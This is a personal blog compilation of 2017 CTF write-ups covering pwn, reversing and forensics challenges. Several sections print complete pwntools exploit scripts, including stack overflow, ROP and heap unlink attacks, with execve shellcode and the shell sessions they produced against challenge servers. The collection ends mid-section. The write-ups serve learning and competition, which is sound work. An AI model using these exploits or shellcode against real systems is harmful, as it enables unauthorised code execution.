20170701_SECUINSIDECTF Writeup

20170701_SECUINSIDECTF Writeup

Yesterday and today, I joined in 20170701_SECUINSIDECTF. There were many difficult problems, and unsolved one.

Fortunately, I could solve 2problem, OHCE and SNAKE. I wrote my solution below.

OHCE pwn

 

This is Stack base overflow chall. This process as below.

 

– First print menu, and I can choose 1. echo 2, reverse echo, 3.exit

– if choose 1, I can type something, and return echo

– if choose 2, I can type something, and return reverse string I typed

– if choose 3, exit program

 

Let’s analyze it. And realize that this don’t have any protection,

 

$ checksec ohce
[*] ‘/mnt/hgfs/VM-Share/20170701_SECUINSIDECTF/ohce/ohce’
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE

 

Next, I continue to execute it, several minutes, I find out that there is Null Byte Termination Vulnerability.

If I input 31+32*n chars in echo mode, next data is leaked. And when I input it in reverse echo, program is halted.

—————–
1. echo
2. echo(Reverse)
3. Exit
—————–
> 1
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
�?Hc�
—————–
1. echo
2. echo(Reverse)
3. Exit
—————–
> 2
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
�cH?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaSegmentation fault (core dumped)

 

What’s happened? Below picuture show that stack information when input 31+32*n chars.

(In this picture unfortunately data of 0x7fffffffdae0 is 00, so this leak don’t occurred…)

 

 

Then reverse echo, because of Null Byte Termination Vulnerability, I can overwrite next address.

Finally overwritten address become esp in [0x400268 mov rsp,rbp], I can got rip.

 

Exploitation is below.

– First leak stack address to write 31 chars in echo

– Next write many chars and stack address to go to shellscript (address in red rectangle) in echo

– Write shellscript and stack address to go to below address (address in light blue rectangle) in reverse echo.

 

 

 
$ python solve_ohce.py
[+] Opening connection to 13.124.134.94 on port 8888: Done
—————–
\x001. echo
2. echo(Reverse)
3. Exit\x00
—————–
\x00 >
0x7ffe4db737a0
0x7ffe4db73770
\x7f\xfeM\xb76`AAAAA\x05\x0f;\xb0^TWR\x99_TS��H\xff\x97\x8cБ\x96\x9dѻH�1\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90
[*] Switching to interactive mode
\x00\x7f\xfeM\xb77\xa0
\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x901�H\xbbѝ\x96\x91Ќ\x97\xffH��ST_\x99RWT^\xb0;\x0f\x05AAAAA`6\xb7M\xfe\x7f$
$
$
$
$
$ ls
flag
ohce
$ cat flag
SECU[the_true_world_and_1n_here_1s_the_dream]
[*] Got EOF while reading in interactive
$
 

SNAKE rev

 

This is the old snake game program.

Several hours investigation, I recognize that this algorithm is as below. (function name is named by me.)

 


 

This program calculate enc_flag and xor-ed another data in clear_game function.

At first, I tried to make script to make those data, but I can’t do this. So I change my direction as below.

 

– I patch program to return true on if(judge_goal) statement.

 

 

 

– I patch program not to change time_duration.

 

 

Then execute it, After several minutes, I can get flag. (You must control snake not to crash to wall until getting flag.)

 

 

 

 

 
SECU[hack_is_the_wine_of_life._Let’s_drink_it.]�u����@
 
 
Patched program:

 

20170624_TMCTF

20170624_TMCTF

 

TMCTF has many Windows based chall and network chall, So I learned about windows reverse method in this ctf. I got 4challs and writeup are below.

 

Reverse 100

 

At first, I get zip file. Using file command, I realize that this file is rar file. So change extension of the file to .rar and extract it.

Then exitract, 2 files is given, biscuit1, biscuit2. biscuit1 is PE32 file and Biscuit2 is password locked zip file. 

$ file biscuit*
biscuit1:     PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
biscuit2:     Zip archive data, at least v2.0 to extract

 

First execute biscuit1.exe, and output is below. I think password of biscuit2.zip is in biscuit1.exe.

>biscuit1.exe
Please find sweets name starting from m for biscuit2.

 

Let’s see this in Ida Pro.

 

 

I understand that I break near leave and can see password in x64dbg.

 

I got password of this. Then I extract 3files and file command to each file.

$ file biscuit*
biscuit3:     JPEG image data, JFIF standard 1.01, aspect ratio, density 1×1, segment length 16, comment: “Optimized by JPEGmini 3.13.3.15 0x411b5876”, baseline, precision 8, 150×150, frames 3
biscuit4:     ASCII text, with CRLF line terminators
biscuit5:     PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows

 

First biscuit3 is JPG, but some odd data(Zip file) is in last part. After extraction, There is 1 text file “cream”

 

Biscuit4 is txt file, “Flag = TMCTF{biscuit3_ biscuit5}”

 

Biscuit5 is PE file too, So analyze file by the same way of biscuit1 and get the string, So finally get the flag.

(TMCTF{biscuit3_ biscuit5} is wrong, TMCTF{biscuit5_biscuit3} is correct, I spend some time to realize that :-()

 


Analysis-Offensive 100

 

I’m given Forensic_Encyption file, and this file is zip file. Then extract it, there are 3 files.

File1 is jpg, fille2 is password locked zip file, file3 is pcap fille. At first, I survey file1, there is some odd string as below. 

 

 

Bese64 decode this string, and put it into fille2 password form, I can extract key.txt. Key.txt seems ESP encryption/Authentication key.

$ echo “VHVyaW5nX01hY2hpbmVfYXV0b21hdG9u” | base64 -d
Turing_Machine_automaton
 
$ cat key.tet
src 192.168.30.211 dst 192.168.30.251
        proto esp spi 0xc300fae7 reqid 1 mode transport
        replay-window 32
        auth hmac(sha1) 0x2f279b853294aad4547d5773e5108de7717f5284
        enc cbc(aes) 0x9d1d2cfa9fa8be81f3e735090c7bd272
        sel src 192.168.30.211/32 dst 192.168.30.251/32
src 192.168.30.251 dst 192.168.30.211
        proto esp spi 0xce66f4fa reqid 1 mode transport
        replay-window 32
        auth hmac(sha1) 0x3bf9c1a31f707731a762ea45a85e21a2192797a3
        enc cbc(aes) 0x886f7e33d21c79ea5bac61e3e17c0422
        sel src 192.168.30.251/32 dst 192.168.30.211/32

 

So I put those information into file3 by wireshark as below.

 

Then ESP packets are decrypted, and I can find below information.

 

After some investigation, I find that those information is related to enigma crypto. So I decode it by using below site.

https://people.physik.hu-berlin.de/~palloks/js/enigma/enigma-m4_v16_en.html

 

 

 


 

misc100

I get 1 pcap file but header of the file is wrong, so I change first 4byte of header A1B2C3D4 to D4C3B2A1.

To do so, I can open wireshark.First I find that some SSL/FTP packets. In traffic of FTP, SSL pre-master secret log is sent, so I save this file and decrypt SSL traffic by using below way.

In the Wireshark configuration menu Edit -> Preferences -> Protocols -> SSL,
    1. In the “Pre-Shared-Key” field, enter Kpsa, i.e. 1a2b3c4d5e6f7a8b
    2. In the (Pre)-Master-Secret log filename field, enter the name of a text file which includes Client Random (32 bytes as 64 hex characters) and the Master          
       Secret (48 bytes as 96 hex characters) as a text line as follows:
             CLIENT_RANDOM <space> 64-characters-random <space> 96-characters-Master-Secret
 
After decryption, I find some html /jpg / css. When I open this html, I can see below page.

 

In this page’s source, There is some odd string ” <samp>HINT: visual cryptgraphy</samp>”.  I realize that I need to decode the flag by using visual cryptography 2 pictures seem like mosaic.

Finally I got flag. (To extract, I use the site to extract base64-ed image: http://ift.tt/2t9HzQj)


Reverse 200

 

I can get some odd text file. After some investigation (by googling “ASK/Manchester Clock 64″), I realize that this is output of RFID tag’s bit stream.

How can I get tag number? Accoding to this site http://ift.tt/2t9Qcuq, Output bitstream is repeated tag information by dividing “111111111”, so I extract tag information (part of green letters in below) and calculate it.

Using Clock:64, Invert:0, Bits Found:625
ASK/Manchester – Clock: 64 – Decoded bitstream:
1110111110111000
1010011110111010
1100111111111111
1011101111011101
1110111110111000
1010011110111010
1100111111111111
1011101111011101
1110111110111000
1010011110111010
1100111111111111
1011101111011101
1110111110111000
1010011110111010
1100111111111111
1011101111011101
1110111110111000
1010011110111010
1100111111111111
1011101111011101
1110111110111000
1010011110111010
1100111111111111
1011101111011101
1110111110111000
1010011110111010
1100111111111111
1011101111011101
1110111110111000
1010011110111010
1100111111111111
1011101111011101

 

Below script is calculating method.

str = [0b11110 ,0b11101 ,0b11101 ,0b11011 ,0b11011 ,0b11101 ,0b11000 ,0b10100 ,0b11110 ,0b11101]
for i in str:
    print hex(i>>1)

 

20170617_googleCTF

20170617_googleCTF

Last week, I joined googleCTF, but I couldn’t solve only 2 chall :-(.  I make writeup of chall I solve.

 
Food
 

This is RE chall and at first, I am given android apk file “food.apk”.

At first dissassemble this file in online service: http://ift.tt/1H4YAZ1.

And get source file. After some investigate, I realize that FoodActivity class execute System.loadLibrary(“cook”) in com/google/ctf/food.

Then I check libcook.so in lib/x86/ by IDA Pro.

 

In this JNI_OnLoad ection, so many values move to stack and execute dec_str function (I named).

 

Then I try to find out what this function do, and recoginize it as beolw.

# divide int to 4-byte value
def parse_to_byte(val):
    byte = []
    byte.append((val>>24)&0xff) # BYTE3
    byte.append((val>>16)&0xff) # BYTE2
    byte.append((val>>8)&0xff) # BYTE1
    byte.append((val)&0xff)
return byte
 
string = “”
 
# decrypt 
for i in str:
    byte_array = parse_to_byte(i)
 
    string += chr(byte_array[0]^byte_array[1])
    string += chr(~((byte_array[2] | ~byte_array[3]) & (byte_array[3] | ~byte_array[2])))
 
print string[::1]
 
#str = [0x1D650B6E, 0x1377416F, 0x16724D62, 0x5320096C, 0x5691D74, 0x86E5A75, 0x4420046B, 0x6F096F, 0x4D634620, 0x10640D6E, 0x4F614520, 0x0A660265, 0x0A650D62, 0x47204A64, 0x36E1A75, 0x0C6F5D72, 0x6675420, 0x4650C68, 0x5B744120, 0x10640564, 0x25410F20]
# -> “/data/data/http://ift.tt/2tisMQq”

 

Then area of 0x00001640+0x15a8 write to d.dex file.

 

And finally call sub_710 function.

 

After analyze of this function, I realize that this function replace one part of d.dex file to another data. 

Inspected source of this function is as below

 

 

Data to replace is in the 0x000015A0+0x90 and xor-ed it by 0x5a.

So I replace this data to d.dex by binary editor manually. And decompile d.dex again by online service.

 

Then I can find 4 files in com/google/ctf/food directory. In C0000F class, flag value and cc() function.

And in cc() function C0004.m0() function caluculate flag and this.f2k.

I can calculate this.f2k by xor-ing bArr and “\u0013\u0011\u0013\u0003\u0004\u0003\u0001\u0005”, So I can find out flag by execute C0004.m0(flag, this.f2k).

I make java file of m0 function, and execute it. (java source is below link)

https://github.com/nacayoshi00/CTF-writeup/blob/master/20170617_googleCTF/solve_.java

 

20170429_DEFCON Writeup2

20170429_DEFCON Writeup2

Last year, I couldn’t solve any challenge in DEFCON. I was sooooo sad! :-(.
But this DEFCON could solve 4 challenge, I recognize impruving myskill :-).
 
crackme

 

This is RE Challenge, I need to find particular word and send its base64-encoded string.

 

This is main disassembled mainfunction. I can see sub_C6C function may compare user input and judge collect or not.

 

 

In sub_C6C function there are many function called. Each function is so small anly compare 1 character.

So I try to find out what character each function compare.

 

 

 

 

Finally I solve it.

$ echo “yes and his hands shook with ex” |base64 –
eWVzIGFuZCBoaXMgaGFuZHMgc2hvb2sgd2l0aCBleAo=
$ nc crackme1_f92e0ab22352440383d58be8f046bebe.quals.shallweplayaga.me 10001
send your solution as base64, followed by a newline
4a2181aaf70b04ec984c233fbe50a1fe600f90062a58d6b69ea15b85531b9652
eWVzIGFuZCBoaXMgaGFuZHMgc2hvb2sgd2l0aCBleAo=
The flag is: important videos best playlist Wigeekuk8

smashme

 

In this challenge, I use return-to-text method to soleve it.

 

 

There is no mitigation, so I can exploit just sending shellcode.

 

$ checksec smashme

[*] ‘/mnt/hgfs/VM-Share/20170429_DEFCON/smashme’

Arch:     amd64-64-little

RELRO:    Partial RELRO

Stack:    No canary found

NX:       NX disabled

PIE:      No PIE

 

Disassembled main function is as below. But at first, I don’t know each function in got-plt section because these sympolic name may be removed.

 

 

I need to find function in .got_plt, so I try to find function as below method.  (ex. 0xc9020 point to memmove)

gdb-peda$ x/10gx 0x00000000006C9020
0x6c9020:    0x0000000000431d60    0x000000000043abf0
0x6c9030:    0x000000000043cd30    0x000000000042db90
0x6c9040:    0x00000000004286a0    0x000000000043d1d0
0x6c9050:    0x000000000042d8e0    0x0000000000493620
0x6c9060:    0x0000000000420940    0x0000000000000000
gdb-peda$x/i 0x0000000000431d60
   0x431d60 <__memmove_avx_unaligned>:    mov    rax,rdi
gdb-peda$

 

Finally I find out got_plt function.

 

 

 

So I find that I escape exit function if I input “”Smash me outside, how bout dAAAAAAAAA”. So I input this, I can go to ret, and do buffer over flow.

For exploitation, I use the Return-to-text(.bss). First return to read function to write user input (shellcode) to bss section. Then input shellcode, and return to bss.

from pwn import *
#r = process(‘./smashme’)
r = remote(‘smashme_omgbabysfirst.quals.shallweplayaga.me’, 57348)
raw_input()
l = r.recvuntil(“Welcome to the Dr. Phil Show. Wanna smash?\n”)
print l
elf = ELF(‘./smashme’)
addr_read = elf.symbols[‘read’]
bss = elf.bss()+0x100
log.info(“[+]”+hex(addr_read))
shellcode = “\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05”
pop_rsi_r15 = 0x004a02d3
pop_rdi = 0x0049c8d3
pwn = “Smash me outside, how bout dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA”
print hex(bss)
print hex(pop_rsi_r15)
# rsi = p64(bss), rdi = 0(stdin), and goto p64(bss)
payload = pwn + p64(pop_rsi_r15)+ p64(bss)+”aaaabbbb”+p64(pop_rdi)+p64(0)+p64(addr_read)+ p64(bss)
print payload
r.sendline(payload)
r.sendline(shellcode)
r.interactive()

 

 

main:
        push    rbp
        mov     rbp, rsp
        sub     rsp, 32
        mov     DWORD PTR [rbp-4], 0
        mov     DWORD PTR [rbp-8], 50
        mov     eax, DWORD PTR [rbp-8]
        movsx   rdx, eax
        lea     rcx, [rbp-32]
        mov     eax, DWORD PTR [rbp-4]
        mov     rsi, rcx
        mov     edi, eax
        call    read
        mov     eax, 0
        leave
        ret          ; rsi = pointer of buf, rdi = fd, rdx = size

 

 

$ python solve_smashme.py
[+] Opening connection to smashme_omgbabysfirst.quals.shallweplayaga.me on port 57348: Done
Welcome to the Dr. Phil Show. Wanna smash?
[*] ‘/mnt/hgfs/VM-Share/20170429_DEFCON/smashme’
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE
[*] [+]0x43ea10
0x6cac60
0x4a02d3
Smash me outside, how bout dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�J\x00\x00\x00\x00\x00`\xacl\x00\x00\x00\x00\x00aaaabbbb��I\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10�C\x00\x00\x00\x00`\xacl\x00\x00\x00\x00\x00
[*] Switching to interactive mode
$
$
$ ls
flag
smashme
$ cat flag
The flag is: You must be at least this tall to play DEF CON CTF 5b43e02608d66dca6144aaec956ec68d
$

magic

 

 

This challenge is similar to crackme challenge, but I need to solve and find flag from many binaries (200 files).

So I try to automate solve method by using python+capstone.

At first I try to find out where this binary start the subroutine which compare user input. After several minutes, I find out all of binary’s subroutines may be in the range from 0x000000000000093B  to 0x0000000000000dff (it don’t need to adjust accurately, because all I need is to be able to pick up all of “cmp rdi, XXh”)

 

 

Source code is as below.

from capstone import *
from pwn import *
import re
import base64
 
def extract_flag(filename):
    f = open(filename,”r”)
    data = f.read()
 
    flag = “”
 
    start = 0x000000000000093B
    end = 0x0000000000000dff
    md = Cs(CS_ARCH_X86, CS_MODE_64)
    for i in md.disasm(data[start:end], end):
        if i.mnemonic == “cmp”:
            if (len(i.op_str.split(‘, ‘)[1]) == 4) & (i.op_str.split(‘, ‘)[0] == “rdi”):
                char = i.op_str.split(‘, ‘)[1]
                flag += chr(int(char,16))
                #print(“%s” %(i.op_str))
 
    return flag
 
r = remote(‘cm2k-magic_b46299df0752c152a8e0c5f0a9e5b8f0.quals.shallweplayaga.me’, 12001)
l = r.recvline()
print l
 
while 1:
 
    filename = r.recvline().split(“\n”)[0]
 
    print filename
    flag_word = extract_flag(filename)
    print flag_word
 
    r.sendline(base64.b64encode(flag_word))

 

 

$ python solve_magic2.py
[+] Opening connection to cm2k-magic_b46299df0752c152a8e0c5f0a9e5b8f0.quals.shallweplayaga.me on port 12001: Done
send your solution as base64, followed by a newline
f1e56ab8dc43fd0e33b79affdb5ac47911206c9a05f82715dbd7882c85fffd59
didn’t surprise Tom, though
b6d7ff0e83f6ac0ac741bc2c64b5b46dc2a274dd83db63c5e41c36133ac1be43
tive work under terms
5b0490ea26d5548596ca99c3f9592c5d16228a6ddeab3aa45a0dc7fabc14ca20
fore I collapsed against a wall, head down.
cb65c85e9d6d3efffd23e1580510bb6f45b2ff8c05c84b9e8e377d3c03ffb34d
n a twinkl
abe60de564ff191f6a001dd43fb4285f74735498bc39c3df63d19bbb591cb01c
burned all his reputation capita
f96c1a402d0757f8b07baef25c806774be614fb9b7271172655e1195d37852f7
 immediate
28a4f8a23587d1919639ff4114e18c7653ddfff4d338f88247820ac61dd1ef54
ut of a printe
a210dea1a1b877ad178d1718c2ccb1fd5e5e0484eeb907e05dbcca2a07ee0e85
gone. A quick chec
fd9431be8119528acf27853559662473ae4f8a2cf7b2e1689fe9fb12943e9802
y rocked in their seats under the blast of
323da730235582b75113790bd7b50c1803386416ebdd45e5ece14c2394f8720c
push it out
The flag is: a color map of the sun sokemsUbif

beatmeonthedl

 

This is one of famous heap exploitation challenge, I can solve using Unsafe Unlink attack (House of Einherjar).

 

from pwn import *
#r = process(‘./beatmeonthedl’)
r = remote(‘beatmeonthedl_498e7cad3320af23962c78c7ebe47e16.quals.shallweplayaga.me’, 6969)
shellcode = “\x90\x90\x90\x90\x90\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05”
raw_input()
# leak stack address -null termination bug in username-
l = r.recvuntil(“Enter username: “)
print l
r.sendline(“aaaaaaaaaaaaaaaa”)
l = r.recvuntil(“Enter username: “)
stack_addr = u64(l.split(“\n”)[0].split(“aaaaaaaaaaaaaaaa”)[1].ljust(8,”\x00″))
log.info(“[+] stack_addr = ” + hex(stack_addr))
# leak heap address -null termination bug in password-
l = r.recvuntil(“Enter username: “)
print l
r.sendline(“mcfly”)
l = r.recvuntil(“Enter Pass: “)
print l
r.sendline(“aaaaaaaaaaaaaaaaaaaaaaaa”)
l = r.recvuntil(“Enter username: “)
heap_addr = u64(l.split(“\n”)[0].split(“aaaaaaaaaaaaaaaaaaaaaaaa”)[1].ljust(8,”\x00″)) -0x10
log.info(“[+] heap_addr = ” + hex(heap_addr))
# login
r.sendline(“mcfly”)
l = r.recvuntil(“Enter Pass: “)
r.sendline(“awesnap”)
l = r.recvuntil(“| “)
print l
def add_req(data):
    log.info(“add_req : ” + data)
    r.sendline(“1”)
    l = r.recvuntil(“Request text > “)
    print l
    r.sendline(data)
    l = r.recvuntil(“| “)
    print l
def print_req():
    log.info(“print_req : “)
    r.sendline(“2”)
    l = r.recvuntil(“| “)
    print l
def delete_req(index):
    log.info(“delete_req : ” + index)
    r.sendline(“3”)
    l = r.recvuntil(“choice: “)
    print l
    r.sendline(index)
    l = r.recvuntil(“| “)
    print l
def update_req(index, data):
    log.info(“update_req : ” +index+”:”+ data)
    r.sendline(“4”)
    l = r.recvuntil(“choice: “)
    print l
    r.sendline(index)
    l = r.recvuntil(“data: “)
    print l
    r.sendline(data)
    l = r.recvuntil(“| “)
    print l
def exit():
    log.info(“exit : “)
    r.sendline(“5”)
    l = r.recvall()
    print l
# add request 5-times for Unsafe Unlink attack (House of Einherjar)
add_req(“aaaaaaaaaa”)
add_req(“bbbbbbbbbb”)
add_req(“bbbbbbbbbb”)
add_req(“bbbbbbbbbb”)
add_req(“bbbbbbbbbb”)
addr_atoi = 0x00000000006099D8
# Make fake chunk and fd->reqlist[4]
update_req(“4”,”b”*(48+16)+p64(0x0)+p64(0xe41)+p64(0x609e90-0x18)+p64(0x609e90-0x10))
# Make fake used chunk for causing unlink
update_req(“3”,”b”*48+p64(0x0)+p64(0x53)+”\x00″*48)
# Cause unlink and reqlist[2] is overwritten to the address(0x609e90-0x18)
delete_req(“4”)
# before overwritten got, prepare shellcode in heap.
update_req(“3”,shellcode)
# Overwrite reqlist[0] to got_atoi address
update_req(“2”,”A”*8+p64(addr_atoi))
# got_atoi address is overwritten to shellcode address.
update_req(“0”,p64(heap_addr+0x110))

 

 

$ python solve_beatmeonthedl.py
[+] Starting local process ‘./beatmeonthedl’: Done
[+] Opening connection to beatmeonthedl_498e7cad3320af23962c78c7ebe47e16.quals.shallweplayaga.me on port 6969: Done
         __      __       .__                                  __
        /  \    /  \ ____ |  |   ____  ____   _____   ____   _/  |_  ____
        \   \/\/   // __ \|  | _/ ___\/  _ \ /     \_/ __ \  \   __\/  _ \
         \        /\  ___/|  |_\  \__(  <_> )  Y Y  \  ___/   |  | (  <_> )
          \__/\  /  \___  >____/\___  >____/|__|_|  /\___  >  |__|  \____/
               \/       \/          \/            \/     \/
      __  .__             .__         .__                 _____    __  .__
    _/  |_|  |__   ____   |  | _____  |__|______    _____/ ____\ _/  |_|  |__   ____
    \   __\  |  \_/ __ \  |  | \__  \ |  \_  __ \  /  _ \   __\  \   __\  |  \_/ __ \
     |  | |   Y  \  ___/  |  |__/ __ \|  ||  | \/ (  <_> )  |     |  | |   Y  \  ___/
     |__| |___|  /\___  > |____(____  /__||__|     \____/|__|     |__| |___|  /\___  >
               \/     \/            \/                                      \/     \/
  _________.__                .___              __________                __
 /   _____/|  |__ _____     __| _/______  _  __ \______   \_______  ____ |  | __ ___________  ______
 \_____  \ |  |  \\__  \   / __ |/  _ \ \/ \/ /  |    |  _/\_  __ \/  _ \|  |/ \// __ \_  __ \/  ___/
 /        \|   Y  \/ __ \_/ /_/ (  <_> )     /   |    |   \ |  | \(  <_> )    <\  ___/|  |  \/\___ \
/_______  /|___|  (____  /\____ |\____/ \/\_/    |______  / |__|   \____/|__|_ \\___  >__|    /____ >
        \/      \/     \/      \/                       \/                    \/    \/             \/
Enter username:
[*] [+] stack_addr = 0x7fff5cee20f0
Invalid user:
(snip)
[*] update_req : 0:\x10\xa1�\x00\x00\x00\x00
0) P\x1f�)N\x7f
1)
2) AAAAAAAAؙ`
3) \x90\x90\x90\x90\x901�H\xbbѝ\x96\x91Ќ\x97\xffH��ST_\x99RWT^\xb0;\x0f\x05
bbbbbbbbbbbbbbb
choice:
data:
I) Request Exploit.
II) Print Requests.
III) Delete Request.
IV) Change Request.
V) Go Away.
|
[*] Switching to interactive mode
$
$
$ ls
beatmeonthedl
flag
$ cat flag
The flag is: 3asy p33zy h3ap hacking!!
$

Tags: wordpress

May 01, 2017 at 10:06AM
Open in Evernote

20170407_INS’HACKCTF Writeup

Xoreing Web 50

 

First I access to the web site, and I can see below login form.

After some try, I recognized that there is one Javascript file (script) in this site.

And if input “admin” in Login area, this script run and compare encoded password to “NeAM+bh_saaES_mFISYYu}nYw}”.

 

At first, I try password “aaaaaaaaaaaaaaaaaaaaaaaaaaaa”, encoded password =”WaWaWaWaWaWaWaWaWaWaWaWaWaWa”.

Encode method is that odd-numbered character is remained and even-numbered character is replaced password-character xor-ed by “6”.

 

Finally, make below script and solve it.

enc = “NeAM+bh_saaES_mFlSYYu}nYw}”
flag = “”
print len(enc)
count = 0
for i in enc:
     if count %2 ==0:
          flag += chr(ord(i)^ord(“6”))
     else:
          flag += i
     count +=1
print flag

Remote Multimedia Controller FOR 75

This file contain strange base64-encoded string.

And try to base64-decode many times, I get flag.

 
 
 

Secure Garden Shed V1 – REV 200

First I try to execute this.

$ ./sgs-exec-release-p lock.sgsc
Enter pasword ([a-z]):
aaaa
Sorry but the password you gave is wrong…

 

So when this file execute, ./sgs-exec-release-p decode lock.sgsc and execute it sequentially.

I think that when user input aaaa, this may call “read” function so I set break point of this function.

 

gdb-peda$ b read
Breakpoint 6 at 0xf7ec8980: file ../sysdeps/unix/syscall-template.S, line 84.
gdb-peda$ c
gdb-peda$ c
Continuing.
Enter pasword ([a-z]):
[———————————-registers———————————–]
EAX: 0x0
EBX: 0xf7fa5000 –> 0x1b1db0
ECX: 0x5655c508 –> 0x0
EDX: 0x400
ESI: 0xf7fa55a0 –> 0xfbad2288
EDI: 0xf7fa5d60 –> 0xfbad2a84
EBP: 0xffffcb38 –> 0xffffcba8 –> 0xffffcc08 –> 0x0
ESP: 0xffffcafc –> 0xf7e5d267 (<_IO_new_file_underflow+295>:    add    esp,0x10)
EIP: 0xf7ec8980 (<read>:    cmp    DWORD PTR gs:0xc,0x0)
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[————————————-code————————————-]
   0xf7ec897b:    xchg   ax,ax
   0xf7ec897d:    xchg   ax,ax
   0xf7ec897f:    nop
=> 0xf7ec8980 <read>:    cmp    DWORD PTR gs:0xc,0x0
   0xf7ec8988 <read+8>:    jne    0xf7ec89b0 <read+48>
   0xf7ec898a <__read_nocancel>:    push   ebx
   0xf7ec898b <__read_nocancel+1>:    mov    edx,DWORD PTR [esp+0x10]
   0xf7ec898f <__read_nocancel+5>:    mov    ecx,DWORD PTR [esp+0xc]
gdb-peda$ fin
 
..(fin command many times)..
gdb-peda$ fin
Run till exit from #0  0xf7e58af1 in _IO_getc (fp=0xf7fa55a0 <_IO_2_1_stdin_>) at getc.c:38
[———————————-registers———————————–]
EAX: 0xa (‘\n’)
EBX: 0x5655af98 –> 0x5eb8
ECX: 0xa (‘\n’)
EDX: 0xf7fa687c –> 0x0
ESI: 0xec
EDI: 0x5655c008 –> 0x0
EBP: 0xffffcc08 –> 0x0
ESP: 0xffffcbb0 –> 0xf7fa55a0 –> 0xfbad2288
EIP: 0x5655717a (lea    edx,[eax-0x61])
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[————————————-code————————————-]
   0x5655716f:    mov    eax,DWORD PTR [esp+0x18]
   0x56557173:    push   DWORD PTR [eax]
   0x56557175:    call   0x56555640
=> 0x5655717a:    lea    edx,[eax-0x61]
   0x5655717d:    add    esp,0x10
   0x56557180:    cmp    edx,0x19
   0x56557183:    ja     0x565573e4
   0x56557189:    mov    edx,DWORD PTR [ebx+0x88]
 
…(Then I try to find part of flag)…
gdb-peda$ find INSA          
Searching for ‘INSA’ in: None ranges
Found 2 results, display max 2 items:
   [heap] : 0x5655c02e (“INSA{Cust0m_15_N0t_S0_E4sy_t0_R3v3rs3_;)}”)
lock.sgsc : 0xf7fd31f2 (“INSA{Cust0m_15_N0t_S0_E4sy_t0_R3v3rs3_;)}”)
 
…(Then investigate near of flag string)….
gdb-peda$ x/100wx 0xf7fd31f2-0x100
0xf7fd30f2:    0x54000114    0x5c000918    0xa4009918    0xd000c518
0xf7fd3102:    0x00006830    0x00000ab4    0x00800dc0    0x00007620
0xf7fd3112:    0xf000006c    0x54800b5c    0xe800006c    0x00801d84
0xf7fd3122:    0x008000b4    0x000004c0    0x00001d84    0x008000b4
0xf7fd3132:    0x008001c0    0x00000430    0x00000040    0x00005230
0xf7fd3142:    0x00200040    0x00001d84    0x008000b4    0x008001c0
0xf7fd3152:    0x00005230    0x00200040    0xe8801d8c    0x008001c0
0xf7fd3162:    0x00005230    0x00200040    0x01800ad4    0x5400006c
0xf7fd3172:    0x00800dc8    0x00005230    0x00200040    0x7461642e
0xf7fd3182:    0x0000b061    0xffff0000    0x6874ffff    0x73697369
0xf7fd3192:    0x72747361    0x70676e6f    0x70737361    0x73617268
0xf7fd31a2:    0x63656265    0x65737561    0x73697469    0x6c616572
0xf7fd31b2:    0x6f6c796c    0x6e61676e    0x6e617264    0x616d6f64
0xf7fd31c2:    0x65687474    0x75646e65    0x6569696f    0x6567636e
0xf7fd31d2:    0x65570072    0x64206c6c    0x21656e6f    0x72654820
0xf7fd31e2:    0x73692065    0x756f7920    0x6c662072    0x203a6761
0xf7fd31f2:    0x41534e49    0x7375437b    0x5f6d3074    0x4e5f3531
0xf7fd3202:    0x535f7430    0x34455f30    0x745f7973    0x33525f30
0xf7fd3212:    0x73723376    0x293b5f33    0x6f53007d    0x20797272
0xf7fd3222:    0x20747562    0x20656874    0x73736170    0x64726f77
0xf7fd3232:    0x756f7920    0x76616720    0x73692065    0x6f727720
0xf7fd3242:    0x2e2e676e    0x6e45002e    0x20726574    0x77736170
0xf7fd3252:    0x2064726f    0x2d615b28    0x3a295d7a    0x00000000
0xf7fd3262:    0x00000000    0x00000000    0x00000000    0x00000000
0xf7fd3272:    0x00000000    0x00000000    0x00000000    0x00000000
gdb-peda$ x/100s 0xf7fd3182
0xf7fd3182:    “a\260”
0xf7fd3185:    “”
0xf7fd3186:    “”
0xf7fd3187:    “”
0xf7fd3188:    “\377\377\377\377thisisastrongpassphrasebecauseitisreallylongandrandomattheenduoiiencger”
0xf7fd31d4:    “Well done! Here is your flag: INSA{Cust0m_15_N0t_S0_E4sy_t0_R3v3rs3_;)}”
0xf7fd321c:    “Sorry but the password you gave is wrong…”
0xf7fd3248:    “Enter pasword ([a-z]):”
0xf7fd325f:    “”
0xf7fd3260:    “”

 

So “thisisastrongpassphrasebecauseitisreallylongandrandomattheenduoiiencger” is password and “INSA{Cust0m_15_N0t_S0_E4sy_t0_R3v3rs3_;)} ” is flag

Hiding In Plain Sight – FOR 100

There is jpg file in inSa (strange name!?) chank in PNG file.

And get the flag!

20170408_ASISCTF Writeup

A fine OTP Server

First, I connect the given site. In this site, I can command F/S/G/P/E/Q as below.
Case of F/S, encrypted stirng is displayed.   And Encrypt Function is displayed in “E” command. Also public key is shown in “P” command.
In “G” command, I need to input correct OTP string.
$ nc 66.172.27.77 35156
|————————————-|
